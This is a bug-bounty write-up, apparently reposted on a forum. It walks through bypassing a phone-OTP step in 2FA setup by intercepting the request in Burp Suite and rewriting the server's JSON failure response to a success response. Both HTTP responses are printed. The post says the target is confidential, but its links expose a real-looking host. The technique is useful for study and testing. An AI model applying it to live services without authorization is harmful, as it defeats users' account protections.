![[FCO]FreeCoursesOnline](https://onehack.us/uploads/default/original/3X/b/4/b4d2fc8468becec1e9976784dba394e5a378ec81.jpg){kind=small}
I recently found a 2fa bypass using Response Manipulation bug on Bugcrowd. This is my first write up…
It got Triaged….
But turned out be a Duplicate 
Let’s Start……
It was a private program so i cannot reveal the website name. Let’s call it as https://example.com. The website was having 2fa functionality and I tried to setup the 2fa ( Two Factor Authentication ). The Two factor authentication is the application will ask for a code after you enter your login id/email and password. Without 2fa code you cannot login once you setup the 2fa on.This bug was on phone verification for adding mfa endpoint.
Steps to reproduce:
[1] go to and https://example.com and create an account
[2] verify emai id and then log in into your account
[3] you will get page where you have to fill information
[4] now there is a phone number verification functionality where we have to verify our phone number
[5] enter phone number and we will get an otp
[6] now enter that otp and intercept this request using burp suite
[7] put wrong otp there and do intercept response to this request
[8] before doing this send that request to repeater and check response for that correct otp so that we can manipulate and send
[9] we will get
HTTP/1.1 200 OK
Date: Wed, 10 Mar 2021 06:42:41 GMT
Content-Type: application/json
Content-Length: 212
Connection: close
Server:
Access-Control-Allow-Origin: [https://example.com](https://app02.us.bill.com/)
Access-Control-Allow-Credentials: true
X-FRAME-OPTIONS: deny
Content-Security-Policy: default-src ‘none’
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
Cache-Control: no-store, no-cache
{
“response_status” : 0,
“response_message” : “Success”,
“response_data” : {
“isSuccessful” : false,
“errorInfo” : “This isn’t the code we sent to +91xxxxxxxxx7.”,
“errorCode” : “BDC_1357”
}
}
Let’s Manipulate this request
Let’s do this first
now change the content length to 114
HTTP/1.1 200 OK
Date: Wed, 10 Mar 2021 06:29:34 GMT
Content-Type: application/json
Content-Length: 114
Connection: close
Server:
Access-Control-Allow-Origin: [https://example](https://app02.us.bill.com/).com
Access-Control-Allow-Credentials: true
X-FRAME-OPTIONS: deny
Content-Security-Policy: default-src ‘none’
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
Cache-Control: no-store, no-cache
{
“response_status” : 0,
“response_message” : “Success”,
“response_data” : {
“isSuccessful” : true
}
}
[10] I was able to bypass that OTP verification code successfully…
And we have successfully bypassed the 2fa 
Never Give Up !!!
Happy learning!